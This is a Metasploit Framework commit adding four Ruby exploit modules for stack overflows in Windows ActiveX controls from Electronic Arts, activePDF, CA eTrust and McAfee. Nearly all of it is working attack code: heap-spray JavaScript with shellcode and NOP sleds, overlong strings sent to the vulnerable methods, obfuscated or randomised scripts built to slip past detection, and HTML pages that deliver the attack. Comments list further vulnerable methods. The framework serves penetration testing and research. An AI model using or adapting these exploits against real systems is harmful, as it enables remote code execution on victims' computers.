added activepdf_webgrabber.rb, etrust_pestscan.rb, ea_checkrequirements.rb and mcafee_hercules_deletesnapshot.rb exploit modules.

git-svn-id: file:///home/svn/framework3/trunk@7167 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2009-10-15 15:22:16 +00:00
parent 5f57666f44
commit 62dc4c74d7
4 changed files with 484 additions and 0 deletions

View File

@ -0,0 +1,115 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Electronic Arts SnoopyCtrl
ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long
string to the CheckRequirements() method, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2007-4466' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Oct 8 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2)
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);
for (index = 0; index < 5000; index++) {
evil_string = evil_string + my_unescape('#{ret}');
}
vulnerable.CheckRequirements(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|
<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

View File

@ -0,0 +1,127 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in activePDF WebGrabber 3.8. When
sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
an attacker may be able to execute arbitrary code. This control is not marked safe
for scripting, so choose your attack vector accordingly.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Aug 26 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('APWebGrabber.Object');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end
=begin
Other methods that are vulnerable.
[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(
BSTR ServerIPAddress,
long ServerPort);
[id(0x00000055)]
BSTR Wait(
BSTR IPAddress,
long PortNumber,
short WaitTime,
BSTR AcceptedCommands);
...and probably more.
=end

View File

@ -0,0 +1,103 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'CA eTrust PestPatrol ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
[ 'URL', 'http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Jun 5 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:5E644C49-F8B0-4E9A-A2ED-5F176BB18CE6'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.Initialize(#{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end

View File

@ -0,0 +1,139 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee Remediation Client ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in McAfee Remediation Agent 4.5.0.41. When
sending an overly long string to the DeletSnapshot() method
of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.
This control is not marked safe for scripting, so choose your attack vector accordingly.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Aug 4 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('Enginecom.imagineLANEngine.1');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.DeleteSnapshot(#{rand8});
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end
=begin
Other vulnerable method's:
[id(0x0000000c), helpstring("method CreateSnapFromDefaultProfile")]
void CreateSnapFromDefaultProfile(BSTR szDescription);
[id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")]
void CreateReportOfSysInfoDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format,
short append);
[id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")]
void CreateReportOfSnapshotDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format);
[id(0x00000012), helpstring("method CreateReportOfAssetDifferences")]
void CreateReportOfAssetDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format,
BSTR pszAsset,
short append);
=end